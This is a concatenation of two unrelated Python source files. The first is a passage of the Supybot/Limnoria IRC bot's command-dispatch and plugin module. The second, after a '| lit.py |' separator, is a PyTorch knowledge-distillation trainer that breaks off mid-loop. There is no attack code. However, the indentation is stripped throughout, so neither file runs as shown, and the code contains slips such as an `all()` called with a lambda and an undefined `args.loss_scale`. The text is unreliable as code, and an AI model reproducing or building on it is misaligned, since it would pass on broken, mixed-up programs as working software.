# It's a list. So we spawn another NestedCommandsIrcProxy
# to evaluate its args. When that class has finished
# evaluating its args, it will call our reply method, which
# will subsequently call this function again, and we'll
# pick up where we left off via self.counter.
cls = withClass or self.__class__
cls(self, self.msg, self.args[self.counter],
nested=self.nested+1)
# We have to return here because the new NestedCommandsIrcProxy
# might not have called our reply method instantly, since
# its command might be threaded. So (obviously) we can't
# just fall through to self.finalEval.
return
# Once all the list args are evaluated, we then evaluate our own
# list of args, since we're assured that they're all strings now.
assert all(lambda x: isinstance(x, minisix.string_types), self.args)
self.finalEval()
def _callInvalidCommands(self):
log.debug('Calling invalidCommands.')
threaded = False
cbs = []
for cb in self.irc.callbacks:
if hasattr(cb, 'invalidCommand'):
cbs.append(cb)
threaded = threaded or cb.threaded
def callInvalidCommands():
self.repliedTo = False
for cb in cbs:
log.debug('Calling %s.invalidCommand.', cb.name())
try:
cb.invalidCommand(self, self.msg, self.args)
except Error as e:
self.error(str(e))
except Exception as e:
log.exception('Uncaught exception in %s.invalidCommand.',
cb.name())
log.debug('Finished calling %s.invalidCommand.', cb.name())
if self.repliedTo:
log.debug('Done calling invalidCommands: %s.',cb.name())
return
if threaded:
name = 'Thread #%s (for invalidCommands)' % world.threadsSpawned
t = world.SupyThread(target=callInvalidCommands, name=name)
t.setDaemon(True)
t.start()
else:
callInvalidCommands()
def findCallbacksForArgs(self, args):
"""Returns a two-tuple of (command, plugins) that has the command
(a list of strings) and the plugins for which it was a command."""
assert isinstance(args, list)
args = list(map(canonicalName, args))
# Find a list maxL such that maxL = args[0:n] for the largest n
# possible such that maxL is a command.
cbs = []
maxL = []
for cb in self.irc.callbacks:
if not hasattr(cb, 'getCommand'):
continue
L = cb.getCommand(args)
if L and L >= maxL:
# equivalent to "L and len(L) >= len(maxL)", because L and maxL
# are both "prefixes" of the same list.
maxL = L
cbs.append((cb, L))
assert isinstance(L, list), \
'getCommand now returns a list, not a method.'
assert utils.iter.startswith(L, args), \
'getCommand must return a prefix of the args given. ' \
'(args given: %r, returned: %r)' % (args, L)
log.debug('findCallbacksForArgs: %r', cbs)
# Filter out all the entries in cbs that are smaller than maxL (ie.
# maxL contains them, with more items at the end.)
cbs = [cb for (cb, L) in cbs if L == maxL]
if len(maxL) == 1:
# Special case: one arg determines the callback. In this case, we
# have to check, in order:
# 1. Whether the arg is the same as the name of a callback. This
# callback would then win.
for cb in cbs:
if cb.canonicalName() == maxL[0]:
return (maxL, [cb])
# 2. Whether a defaultplugin is defined.
defaultPlugins = conf.supybot.commands.defaultPlugins
try:
defaultPlugin = defaultPlugins.get(maxL[0])()
log.debug('defaultPlugin: %r', defaultPlugin)
if defaultPlugin:
cb = self.irc.getCallback(defaultPlugin)
if cb in cbs:
# This is just a sanity check, but there's a small
# possibility that a default plugin for a command
# is configured to point to a plugin that doesn't
# actually have that command.
return (maxL, [cb])
except registry.NonExistentRegistryEntry:
pass
# 3. Whether an importantPlugin is one of the responses.
important = defaultPlugins.importantPlugins()
important = list(map(canonicalName, important))
importants = []
for cb in cbs:
if cb.canonicalName() in important:
importants.append(cb)
if len(importants) == 1:
return (maxL, importants)
return (maxL, cbs)
def finalEval(self):
# Now that we've already iterated through our args and made sure
# that any list of args was evaluated (by spawning another
# NestedCommandsIrcProxy to evaluated it into a string), we can finally
# evaluated our own list of arguments.
assert not self.finalEvaled, 'finalEval called twice.'
self.finalEvaled = True
# Now, the way we call a command is we iterate over the loaded plugins,
# asking each one if the list of args we have interests it. The
# way we do that is by calling getCommand on the plugin.
# The plugin will return a list of args which it considers to be
# "interesting." We will then give our args to the plugin which
# has the *longest* list. The reason we pick the longest list is
# that it seems reasonable that the longest the list, the more
# specific the command is. That is, given a list of length X, a list
# of length X+1 would be even more specific (assuming that both lists
# used the same prefix. Of course, if two plugins return a list of the
# same length, we'll just error out with a message about ambiguity.
(command, cbs) = self.findCallbacksForArgs(self.args)
if not cbs:
# We used to handle addressedRegexps here, but I think we'll let
# them handle themselves in getCommand. They can always just
# return the full list of args as their "command".
self._callInvalidCommands()
elif len(cbs) > 1:
names = sorted([cb.name() for cb in cbs])
command = formatCommand(command)
self.error(format(_('The command %q is available in the %L '
'plugins. Please specify the plugin '
'whose command you wish to call by using '
'its name as a command before %q.'),
command, names, command))
else:
cb = cbs[0]
args = self.args[len(command):]
if world.isMainThread() and \
(cb.threaded or conf.supybot.debug.threadAllCommands()):
t = CommandThread(target=cb._callCommand,
args=(command, self, self.msg, args))
t.start()
else:
cb._callCommand(command, self, self.msg, args)
def reply(self, s, noLengthCheck=False, prefixNick=None, action=None,
private=None, notice=None, to=None, msg=None,
sendImmediately=False, stripCtcp=True):
# These use and or or based on whether or not they default to True or
# False. Those that default to True use and; those that default to
# False use or.
assert not isinstance(s, ircmsgs.IrcMsg), \
'Old code alert: there is no longer a "msg" argument to reply.'
self.repliedTo = True
if msg is None:
msg = self.msg
if prefixNick is not None:
self.prefixNick = prefixNick
if action is not None:
self.action = self.action or action
if action:
self.prefixNick = False
self.noLengthCheck = True
if notice is not None:
self.notice = self.notice or notice
if private is not None:
self.private = self.private or private
target = self._getTarget(to)
# action=True implies noLengthCheck=True and prefixNick=False
self.noLengthCheck=noLengthCheck or self.noLengthCheck or self.action
if not isinstance(s, minisix.string_types): # avoid trying to str() unicode
s = str(s) # Allow non-string esses.
if self.finalEvaled:
try:
self._sendReply(
s=s, target=target, msg=msg,
to=self.to,
notice=self.notice,
action=self.action,
private=self.private,
prefixNick=self.prefixNick,
stripCtcp=stripCtcp,
noLengthCheck=self.noLengthCheck,
sendImmediately=sendImmediately,
)
except:
log.exception('Error while sending reply')
raise
finally:
self._resetReplyAttributes()
else:
if msg.ignored:
# Since the final reply string is constructed via
# ' '.join(self.args), the args index for ignored commands
# needs to be popped to avoid extra spaces in the final reply.
self.args.pop(self.counter)
msg.tag('ignored', False)
else:
self.args[self.counter] = s
self.evalArgs()
def noReply(self, msg=None):
if msg is None:
msg = self.msg
super(NestedCommandsIrcProxy, self).noReply(msg=msg)
if self.finalEvaled:
if isinstance(self.irc, NestedCommandsIrcProxy):
self.irc.noReply(msg=msg)
else:
msg.tag('ignored', True)
else:
self.args.pop(self.counter)
msg.tag('ignored', False)
self.evalArgs()
def replies(self, L, prefixer=None, joiner=None,
onlyPrefixFirst=False, to=None,
oneToOne=None, **kwargs):
if not self.finalEvaled and oneToOne is None:
oneToOne = True
return super(NestedCommandsIrcProxy, self).replies(L,
prefixer=prefixer, joiner=joiner,
onlyPrefixFirst=onlyPrefixFirst, to=to,
oneToOne=oneToOne, **kwargs)
def error(self, s='', Raise=False, **kwargs):
r"""Replies with an error.
:arg str s:
The error message
:arg bool Raise:
If True, this will raise :class:`Error` that will propagate so
that the caller of this function immediately terminates
:arg \**kwargs:
See :meth:`NestedCommandsIrcProxy.reply`'s keyword arguments
"""
self.repliedTo = True
if Raise:
raise Error(s)
if not isinstance(self.irc, irclib.Irc):
return self.irc.error(s, **kwargs)
elif s:
m = _makeErrorReply(self, self.msg, s, **kwargs)
self.irc.queueMsg(m)
return m
def __getattr__(self, attr):
return getattr(self.irc, attr)
IrcObjectProxy = NestedCommandsIrcProxy
class CommandThread(world.SupyThread):
"""Just does some extra logging and error-recovery for commands that need
to run in threads.
"""
def __init__(self, target=None, args=(), kwargs={}):
self.command = args[0]
self.cb = target.__self__
threadName = 'Thread #%s (for %s.%s)' % (world.threadsSpawned,
self.cb.name(),
self.command)
log.debug('Spawning thread %s (args: %r)', threadName, args)
self.__parent = super(CommandThread, self)
self.__parent.__init__(target=target, name=threadName,
args=args, kwargs=kwargs)
self.setDaemon(True)
self.originalThreaded = self.cb.threaded
self.cb.threaded = True
def run(self):
try:
self.__parent.run()
finally:
self.cb.threaded = self.originalThreaded
class CommandProcess(world.SupyProcess):
"""Just does some extra logging and error-recovery for commands that need
to run in processes.
"""
def __init__(self, target=None, args=(), kwargs={}):
pn = kwargs.pop('pn', 'Unknown')
cn = kwargs.pop('cn', 'unknown')
procName = 'Process #%s (for %s.%s)' % (world.processesSpawned,
pn,
cn)
log.debug('Spawning process %s (args: %r)', procName, args)
self.__parent = super(CommandProcess, self)
self.__parent.__init__(target=target, name=procName,
args=args, kwargs=kwargs)
def run(self):
self.__parent.run()
class CanonicalString(registry.NormalizedString):
def normalize(self, s):
return canonicalName(s)
class CanonicalNameSet(utils.NormalizingSet):
def normalize(self, s):
return canonicalName(s)
class CanonicalNameDict(utils.InsensitivePreservingDict):
def key(self, s):
return canonicalName(s)
class Disabled(registry.SpaceSeparatedListOf):
sorted = True
Value = CanonicalString
List = CanonicalNameSet
conf.registerGlobalValue(conf.supybot.commands, 'disabled',
Disabled([], _("""Determines what commands are currently disabled. Such
commands will not appear in command lists, etc. They will appear not even
to exist.""")))
class DisabledCommands(object):
def __init__(self):
self.d = CanonicalNameDict()
for name in conf.supybot.commands.disabled():
if '.' in name:
(plugin, command) = name.split('.', 1)
if command in self.d:
if self.d[command] is not None:
self.d[command].add(plugin)
else:
self.d[command] = CanonicalNameSet([plugin])
else:
self.d[name] = None
def disabled(self, command, plugin=None):
if command in self.d:
if self.d[command] is None:
return True
elif plugin in self.d[command]:
return True
return False
def add(self, command, plugin=None):
if plugin is None:
self.d[command] = None
else:
if command in self.d:
if self.d[command] is not None:
self.d[command].add(plugin)
else:
self.d[command] = CanonicalNameSet([plugin])
def remove(self, command, plugin=None):
if plugin is None:
del self.d[command]
else:
if self.d[command] is not None:
self.d[command].remove(plugin)
class BasePlugin(object):
def __init__(self, *args, **kwargs):
self.cbs = []
for attr in dir(self):
if attr != canonicalName(attr):
continue
obj = getattr(self, attr)
if isinstance(obj, type) and issubclass(obj, BasePlugin):
cb = obj(*args, **kwargs)
setattr(self, attr, cb)
self.cbs.append(cb)
cb.log = log.getPluginLogger('%s.%s' % (self.name(),cb.name()))
super(BasePlugin, self).__init__()
class MetaSynchronizedAndFirewalled(log.MetaFirewall, utils.python.MetaSynchronized):
pass
SynchronizedAndFirewalled = MetaSynchronizedAndFirewalled(
'SynchronizedAndFirewalled', (), {})
class Commands(BasePlugin, SynchronizedAndFirewalled):
__synchronized__ = (
'__call__',
'callCommand',
'invalidCommand',
)
# For a while, a comment stood here to say, "Eventually callCommand." But
# that's wrong, because we can't do generic error handling in this
# callCommand -- plugins need to be able to override callCommand and do
# error handling there (see the Web plugin for an example).
__firewalled__ = {'isCommand': None,
'_callCommand': None}
commandArgs = ['self', 'irc', 'msg', 'args']
# These must be class-scope, so all plugins use the same one.
_disabled = DisabledCommands()
pre_command_callbacks = []
def name(self):
"""Returns the name of this Commands object (usually the plugin
name)."""
return self.__class__.__name__
def canonicalName(self):
"""Same as :py:meth:`name`, but normalized."""
return canonicalName(self.name())
def isDisabled(self, command):
"""Returns whether the given ``command`` is disabled."""
return self._disabled.disabled(command, self.name())
def isCommandMethod(self, name):
"""Returns whether a given method name is a command in this plugin.
Plugins only need to implement this if they have a dynamic set of
commands."""
# This function is ugly, but I don't want users to call methods like
# doPrivmsg or __init__ or whatever, and this is good to stop them.
# Don't normalize this name: consider outFilter(self, irc, msg).
# name = canonicalName(name)
if self.isDisabled(name):
return False
if name != canonicalName(name):
return False
if hasattr(self, name):
method = getattr(self, name)
if inspect.ismethod(method):
code = method.__func__.__code__
return inspect.getargs(code)[0] == self.commandArgs
else:
return False
else:
return False
def isCommand(self, command):
"""Convenience, backwards-compatibility, semi-deprecated."""
if isinstance(command, minisix.string_types):
return self.isCommandMethod(command)
else:
# Since we're doing a little type dispatching here, let's not be
# too liberal.
assert isinstance(command, list)
return self.getCommand(command) == command
def getCommand(self, args, stripOwnName=True):
"""Among all the commands in this Commands object, recursively
searches for the command whose name is the longst substring
of ``args``, and returns its name, splitted on spaces."""
assert args == list(map(canonicalName, args))
first = args[0]
for cb in self.cbs:
if first == cb.canonicalName():
return cb.getCommand(args)
if first == self.canonicalName() and len(args) > 1 and \
stripOwnName:
ret = self.getCommand(args[1:], stripOwnName=False)
if ret:
return [first] + ret
if self.isCommandMethod(first):
return [first]
return []
def getCommandMethod(self, command):
"""Gets the given command from this plugin, using
:py:meth:`getCommand`.
Plugins only need to implement this if they have a dynamic set of
commands."""
#print '*** %s.getCommandMethod(%r)' % (self.name(), command)
assert not isinstance(command, minisix.string_types)
assert command == list(map(canonicalName, command))
assert self.getCommand(command) == command
for cb in self.cbs:
if command[0] == cb.canonicalName():
return cb.getCommandMethod(command)
if len(command) > 1:
assert command[0] == self.canonicalName()
return self.getCommandMethod(command[1:])
else:
method = getattr(self, command[0])
if inspect.ismethod(method):
code = method.__func__.__code__
if inspect.getargs(code)[0] == self.commandArgs:
return method
else:
raise AttributeError
def listCommands(self, pluginCommands=[]):
"""List all the commands in this ``Commands`` object.
Plugins only need to implement this if they have a dynamic set of
commands."""
commands = set(pluginCommands)
for s in dir(self):
if self.isCommandMethod(s):
commands.add(s)
for cb in self.cbs:
name = cb.canonicalName()
for command in cb.listCommands():
if command == name:
commands.add(command)
else:
commands.add(' '.join([name, command]))
L = list(commands)
L.sort()
return L
def callCommand(self, command, irc, msg, *args, **kwargs):
"""Given a command name, gets the method with
:py:meth:`getCommandMethod` and calls it."""
# We run all callbacks before checking if one of them returned True
if any(bool, list(cb(self, command, irc, msg, *args, **kwargs)
for cb in self.pre_command_callbacks)):
return
method = self.getCommandMethod(command)
method(irc, msg, *args, **kwargs)
def _callCommand(self, command, irc, msg, *args, **kwargs):
if irc.nick == msg.args[0]:
self.log.info('%s called in private by %q.', formatCommand(command),
msg.prefix)
else:
self.log.info('%s called on %s by %q.', formatCommand(command),
msg.args[0], msg.prefix)
try:
if len(command) == 1 or command[0] != self.canonicalName():
fullCommandName = [self.canonicalName()] + command
else:
fullCommandName = command
# Let "P" be the plugin and "X Y" the command name. The
# fullCommandName is "P X Y"
# check "Y"
cap = checkCommandCapability(msg, self, command[-1])
if cap:
irc.errorNoCapability(cap)
return
# check "P", "P.X", and "P.X.Y"
prefix = []
for name in fullCommandName:
prefix.append(name)
cap = checkCommandCapability(msg, self, prefix)
if cap:
irc.errorNoCapability(cap)
return
try:
self.callingCommand = command
self.callCommand(command, irc, msg, *args, **kwargs)
finally:
self.callingCommand = None
except SilentError:
pass
except (getopt.GetoptError, ArgumentError) as e:
self.log.debug('Got %s, giving argument error.',
utils.exnToString(e))
help = self.getCommandHelp(command)
if 'command has no help.' in help:
# Note: this case will never happen, unless 'checkDoc' is set
# to False.
irc.error(_('Invalid arguments for %s.') % formatCommand(command))
else:
irc.reply(help)
except (SyntaxError, Error) as e:
self.log.debug('Error return: %s', utils.exnToString(e))
irc.error(str(e))
except Exception as e:
self.log.exception('Uncaught exception in %s.', command)
if conf.supybot.reply.error.detailed():
irc.error(utils.exnToString(e))
else:
irc.replyError(msg=msg)
def getCommandHelp(self, command, simpleSyntax=None):
"""Returns the help string of the given command, using
:py:meth:`getCommandMethod`."""
method = self.getCommandMethod(command)
help = getHelp
chan = None
net = None
if dynamic.msg is not None:
chan = dynamic.msg.channel
if dynamic.irc is not None:
net = dynamic.irc.network
if simpleSyntax is None:
simpleSyntax = conf.get(conf.supybot.reply.showSimpleSyntax,
channel=chan, network=net)
if simpleSyntax:
help = getSyntax
if hasattr(method, '__doc__'):
return help(method, name=formatCommand(command))
else:
return format(_('The %q command has no help.'),
formatCommand(command))
class PluginMixin(BasePlugin, irclib.IrcCallback):
public = True
alwaysCall = ()
threaded = False
noIgnore = False
classModule = None
Proxy = NestedCommandsIrcProxy
def __init__(self, irc):
myName = self.name()
self.log = log.getPluginLogger(myName)
self.__parent = super(PluginMixin, self)
self.__parent.__init__(irc)
# We can't do this because of the specialness that Owner and Misc do.
# I guess plugin authors will have to get the capitalization right.
# self.callAfter = map(str.lower, self.callAfter)
# self.callBefore = map(str.lower, self.callBefore)
def canonicalName(self):
return canonicalName(self.name())
def __call__(self, irc, msg):
irc = SimpleProxy(irc, msg)
if msg.command == 'PRIVMSG':
if hasattr(self.noIgnore, '__call__'):
noIgnore = self.noIgnore(irc, msg)
else:
noIgnore = self.noIgnore
if (noIgnore or
not msg.prefix or # simulated echo message
not ircutils.isUserHostmask(msg.prefix) or # Some services impl.
not ircdb.checkIgnored(msg.prefix, msg.channel)):
self.__parent.__call__(irc, msg)
else:
self.__parent.__call__(irc, msg)
def registryValue(self, name, channel=None, network=None, *, value=True):
"""Returns the value of a configuration variable specified by
``name``.
If the configuration variable has a channel- or network-specific
variable (ie. if its value can change across channels or networks),
``channel`` and ``network`` allow getting the most specific value.
If neither is given, returns the generic value.
If ``value=False``, returns the variable itself (an instance
of :py:class:`supybot.registry.Value`) instead of its value."""
if isinstance(network, bool):
# Network-unaware plugin that uses 'value' as a positional
# argument.
(network, value) = (value, network)
plugin = self.name()
group = conf.supybot.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
if channel or network:
group = group.getSpecific(network=network, channel=channel)
if value:
return group()
else:
return group
def setRegistryValue(self, name, value, channel=None, network=None):
"""Sets a configuration variable. See :py:meth:`registryValue`"""
plugin = self.name()
group = conf.supybot.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
if network:
group = group.get(':' + network)
if channel:
group = group.get(channel)
group.setValue(value)
def userValue(self, name, prefixOrName, default=None):
try:
id = str(ircdb.users.getUserId(prefixOrName))
except KeyError:
return None
plugin = self.name()
group = conf.users.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
return group.get(id)()
def setUserValue(self, name, prefixOrName, value,
ignoreNoUser=True, setValue=True):
try:
id = str(ircdb.users.getUserId(prefixOrName))
except KeyError:
if ignoreNoUser:
return
else:
raise
plugin = self.name()
group = conf.users.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
group = group.get(id)
if setValue:
group.setValue(value)
else:
group.set(value)
def getPluginHelp(self):
if hasattr(self, '__doc__'):
return self.__doc__
else:
return None
class Plugin(PluginMixin, Commands):
pass
Privmsg = Plugin # Backwards compatibility.
class PluginRegexp(Plugin):
"""Same as Plugin, except allows the user to also include regexp-based
callbacks. All regexp-based callbacks must be specified in the set (or
list) attribute "regexps", "addressedRegexps", or "unaddressedRegexps"
depending on whether they should always be triggered, triggered only when
the bot is addressed, or triggered only when the bot isn't addressed.
"""
flags = re.I
regexps = ()
"""'regexps' methods are called whether the message is addressed or not."""
addressedRegexps = ()
"""'addressedRegexps' methods are called only when the message is addressed,
and then, only with the payload (i.e., what is returned from the
'addressed' function."""
unaddressedRegexps = ()
"""'unaddressedRegexps' methods are called only when the message is *not*
addressed."""
Proxy = SimpleProxy
def __init__(self, irc):
self.__parent = super(PluginRegexp, self)
self.__parent.__init__(irc)
self.res = []
self.addressedRes = []
self.unaddressedRes = []
for name in self.regexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.res.append((r, name))
for name in self.addressedRegexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.addressedRes.append((r, name))
for name in self.unaddressedRegexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.unaddressedRes.append((r, name))
def _callRegexp(self, name, irc, msg, m):
method = getattr(self, name)
try:
method(irc, msg, m)
except Error as e:
irc.error(str(e))
except Exception as e:
self.log.exception('Uncaught exception in _callRegexp:')
def invalidCommand(self, irc, msg, tokens):
s = ' '.join(tokens)
for (r, name) in self.addressedRes:
for m in r.finditer(s):
self._callRegexp(name, irc, msg, m)
def doPrivmsg(self, irc, msg):
if msg.isError:
return
proxy = self.Proxy(irc, msg)
if not msg.addressed:
for (r, name) in self.unaddressedRes:
for m in r.finditer(msg.args[1]):
self._callRegexp(name, proxy, msg, m)
for (r, name) in self.res:
for m in r.finditer(msg.args[1]):
self._callRegexp(name, proxy, msg, m)
PrivmsgCommandAndRegexp = PluginRegexp
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
lit.py
|
"""
Author: Animesh Koratana <koratana@stanford.edu>
LIT: Lightweight Iterative Trainer
"""
import os
import time
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.cuda
import torch.optim
import torch.utils.data
from tqdm import tqdm
from model_parallel import *
import threading
import fp16
from tensorboardX import SummaryWriter
beta = 0.5
class Section(object):
def __init__(self, section):
self.network = section
self.optimizer = None
self.lr_scheduler = None
self.params = None
self.init = False
self.set_initial_lr = False
self.device = torch.device("cpu")
#Half vars
self.half = None
self.loss_scaling = 1
def set_optimizer(self, optimizer_fn, train_params):
self.optimizer = optimizer_fn
self.params = train_params
return self
def set_lr_scheduler(self, scheduler):
self.lr_scheduler = scheduler
return self
def build(self, half = False):
assert self.network and self.optimizer and self.lr_scheduler and self.params
self.half = half
if self.half:
# Cast network to half
self.network = fp16.FP16(self.network)
# Manage a fp32 version of the weights
self.params = [param.clone().type(torch.cuda.FloatTensor).detach() for param in self.params]
for p in self.params:
p.requires_grad = True
self.optimizer = self.optimizer(self.params)
if self.set_initial_lr:
for group in self.optimizer.param_groups:
group.setdefault('initial_lr', group['lr'])
self.lr_scheduler = self.lr_scheduler(self.optimizer)
self.init = True
return self
def __call__(self, inp):
return self.network(inp)
def step(self, out, target, losses_log, criterion, lock):
global beta
assert(self.init)
loss = criterion(out, target) * self.loss_scaling * (1 - beta)
if self.half:
loss.backward()
fp16.set_grad(self.params, list(self.network.parameters()))
if self.loss_scaling != 1:
for param in self.params:
param.grad.data = param.grad.data/args.loss_scale
self.optimizer.step()
fp16.copy_in_params(self.network, self.params)
self.network.zero_grad()
else:
loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
with lock:
losses_log.update(loss.item(), out.size(0))
def eval(self, out, target, losses_log, criterion, lock):
loss = criterion(out, target)
with lock:
losses_log.update(loss.item(), out.size(0))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def correct(outputs, targets, top=(1, )):
with torch.no_grad():
_, predictions = outputs.topk(max(top), dim=1, largest=True, sorted=True)
targets = targets.view(-1, 1).expand_as(predictions)
corrects = predictions.eq(targets).cpu().int().cumsum(1).sum(0)
tops = list(map(lambda k: corrects.data[k - 1], top))
return tops
class LitTrainer():
def __init__(self, f):
cudnn.benchmark = True
global beta
beta = f.beta
self.distributed = torch.cuda.device_count() > 1
# Check the save_dir exists or not
if not os.path.exists(f.save_dir):
os.makedirs(f.save_dir)
if not os.path.exists(f.log_dir):
os.makedirs(f.log_dir)
self.writer = SummaryWriter(f.log_dir)
self.save_dir = f.save_dir
self.model_name = f.model_name
self.save_every = f.save_every
self.start_epoch = f.start_epoch
self.start_segment = f.start_segment
self.half = f.half
self.lit_sections = f.lit_sections
self.sequence = f.sequence
self.momentum = f.momentum
self.weight_decay = f.weight_decay
self.loss_scaling = f.loss_scaling
self._make_optimizers(self.lit_sections)
self.trainable_model = LearnerModelParallel(f.trainable_model, self.lit_sections)
for section in self.lit_sections.values():
section.build(half = self.half)
self.base_model = f.base_model
if self.half:
self.base_model = fp16.FP16(self.base_model)
self.base_model = nn.DataParallel(self.base_model).cuda()
for param in self.base_model.parameters(): param.requires_grad = False
self.lit_train_loader = f.lit_training_data_loader
self.fine_tuning_loader = f.fine_tuning_data_loader
self.val_loader = f.val_data_loader
self.lit_criterion = f.lit_criterion()
self.fine_tuning_criterion = f.fine_tuning_criterion()
self.best_accuracy1 = 0
def _make_optimizers(self, lit_sections):
lit_start_epoch = self.start_epoch if self.start_segment == 0 else 0
for k, v in lit_sections.items():
v.loss_scaling = self.loss_scaling
v.set_optimizer(lambda params :torch.optim.SGD(params,
lr = self.sequence["lit"]["lr"],
momentum=self.momentum,
weight_decay=self.weight_decay),
train_params = v.network.parameters())
if lit_start_epoch > 0:
v.set_initial_lr = True
v.set_lr_scheduler(lambda optimizer : torch.optim.lr_scheduler.MultiStepLR(optimizer,
milestones=self.sequence["lit"]["milestones"],
last_epoch=lit_start_epoch-1, gamma=0.5))
def train(self):
self._train_lit()
torch.cuda.empty_cache()
self.trainable_model.cpu()
self.trainable_model = self.trainable_model.module
self._fine_tune()
def _train_lit(self):
if self.start_segment > 0: return
# Freeze the whole model and then unfreeze only the sections
for param in self.trainable_model.parameters():
param.requires_grad = False
self._unfreeze_training_model_sections(*list(self.lit_sections.keys()))
for epoch in tqdm(range(self.start_epoch, self.sequence["lit"]["epochs"]), desc="LIT Training", dynamic_ncols=True):
t_losses, t_data_time, t_batch_time = self._lit_train_one_epoch(epoch)
v_losses, v_data_time, v_batch_time = self._lit_eval_one_epoch(epoch)
for section in self.lit_sections.values(): section.lr_scheduler.step()
for i, (t_loss, v_loss) in enumerate(zip(t_losses, v_losses)):
# Add logging data
self.writer.add_scalar('loss/section{t}/train'.format(t=i+1), t_loss, epoch)
self.writer.add_scalar('loss/section{t}/validation'.format(t=i+1), v_loss, epoch)
if epoch > 0 and epoch % self.save_every:
torch.save(self.trainable_model.module.state_dict(),
os.path.join(self.save_dir, str("checkpoint_" + self.model_name)))
def _fine_tune(self):
torch.cuda.empty_cache()
if self.start_segment<=2:
# Unfreeze everything and then train everything together
for param in self.trainable_model.parameters():
param.requires_grad = True
if self.half:
self.trainable_model = nn.DataParallel(fp16.FP16(self.trainable_model)).cuda()
param_copy = [param.clone().type(torch.cuda.FloatTensor).detach() for param in self.trainable_model.parameters()]
for param in param_copy:
param.requires_grad = True
optimizer = torch.optim.SGD(param_copy, self.sequence["full_model"]["lr"],
momentum=self.momentum,
weight_decay=self.weight_decay)
else:
param_copy = None
self.trainable_model = nn.DataParallel(self.trainable_model).cuda()
optimizer = torch.optim.SGD(self.trainable_model.parameters(), self.sequence["full_model"]["lr"],
momentum=self.momentum,
weight_decay=self.weight_decay)
start_epoch = self.start_epoch if self.start_segment == 2 else 0
if start_epoch > 0:
for group in optimizer.param_groups:
group.setdefault('initial_lr', group['lr'])
lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=self.sequence["full_model"]["milestones"], last_epoch=start_epoch-1)
self._run_fine_tuning_epochs(optimizer, lr_scheduler, "full model", self.sequence["full_model"]["epochs"], start_epoch=start_epoch, params= param_copy)
def _run_fine_tuning_epochs(self, optimizer, lr_scheduler, tag, num_epochs, start_epoch = 0, params = None):
for epoch in tqdm(range(start_epoch, num_epochs), desc="Fine Tuning {}".format(tag), dynamic_ncols=True):
t_loss, t_data_time, t_batch_time, t_accuracy1 = self._fine_tune_train_one_epoch(
tag=tag, optimizer=optimizer, current_epoch=epoch)
v_loss, v_data_time, v_batch_time, v_accuracy1 = self._fine_tune_evaluate_one_epoch(
tag=tag, current_epoch=epoch)
self.writer.add_scalar('loss/{t}/train'.format(t=tag), t_loss, epoch)
self.writer.add_scalar('loss/{t}/validation'.format(t=tag), v_loss, epoch)
self.writer.add_scalar('prec1/{t}/train'.format(t=tag), t_accuracy1, epoch)
self.writer.add_scalar('prec1/{t}/validation'.format(t=tag), v_accuracy1, epoch)
best = v_accuracy1 > self.best_accuracy1
self.best_accuracy1 = max(v_accuracy1, self.best_accuracy1)
if best:
tqdm.write("Saving the best model with prec1@ {a}".format(a=v_accuracy1))
torch.save(self.trainable_model.module.state_dict(), os.path.join(self.save_dir, self.model_name))
if epoch > 0 and epoch % self.save_every:
torch.save(self.trainable_model.module.state_dict(),
os.path.join(self.save_dir, str("checkpoint_" + self.model_name)))
lr_scheduler.step()
def _lit_train_one_epoch(self, current_epoch):
global beta
batch_time = AverageMeter()
data_time = AverageMeter()
losses = [AverageMeter() for i in range(len(self.lit_sections.keys()))]
# switch to appropriate mode
self.trainable_model.train()
self.base_model.eval()
criterion = self.lit_criterion
end = time.time()
data_loader = self.lit_train_loader
lock = threading.Lock()
for i, (inp, target) in tqdm(enumerate(data_loader),
desc='LIT Training: Epoch {epoch}'.format(epoch = current_epoch),
dynamic_ncols=True, total= len(data_loader), leave=True):
batch_size = target.size(0)
assert batch_size < 2**32, 'Size is too large! correct will overflow'
# measure data loading time
data_time.update(time.time() - end)
input_var = inp.cuda().detach()
#Get teacher model's intermediate
with torch.no_grad():
teacher_features, soft_targets = self.base_model(input_var, get_features = True)
learner_features = self.trainable_model(teacher_features)
learner_out = self.trainable_model.module(input_var)
full_loss = self.fine_tuning_criterion(learner_out, soft_targets, target) * beta
full_loss.backward(retain_graph=True)
jobs = []
for id in self.lit_sections.keys():
learner_output = learner_features[id]
target_feature = teacher_features[id].cuda(self.lit_sections[id].device)
losses_log = losses[id-1]
p = threading.Thread(target=self.lit_sections[id].step, args=(learner_output, target_feature, losses_log, criterion, lock))
jobs.append(p)
for job in jobs:
job.start()
for job in jobs:
job.join()
batch_time.update(time.time() - end)
end = time.time()
# Clean up
del inp, teacher_features, input_var, learner_output
return [loss.avg for loss in losses], data_time.avg, batch_time.avg
def _lit_eval_one_epoch(self, current_epoch):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = [AverageMeter() for i in range(len(self.lit_sections.keys()))]
# switch to appropriate mode
self.trainable_model.eval()
self.base_model.eval()
criterion = self.lit_criterion
end = time.time()
lock = threading.Lock()
with torch.no_grad():
for i, (inp, target) in tqdm(enumerate(self.val_loader),
desc='LIT Validation: Epoch {epoch}'.format(epoch=current_epoch),
dynamic_ncols=True, total=len(self.val_loader), leave=True):
batch_size = target.size(0)
assert batch_size < 2**32, 'Size is too large! correct will overflow'
# measure data loading time
data_time.update(time.time() - end)
input_var = inp.cuda().detach()
# Get teacher model's intermediate
teacher_features, _ = self.base_model(input_var, get_features=True)
learner_features = self.trainable_model(teacher_features)
jobs = []
for id in self.lit_sections.keys():
learner_output = learner_features[id]
target_feature = teacher_features[id].cuda(self.lit_sections[id].device)
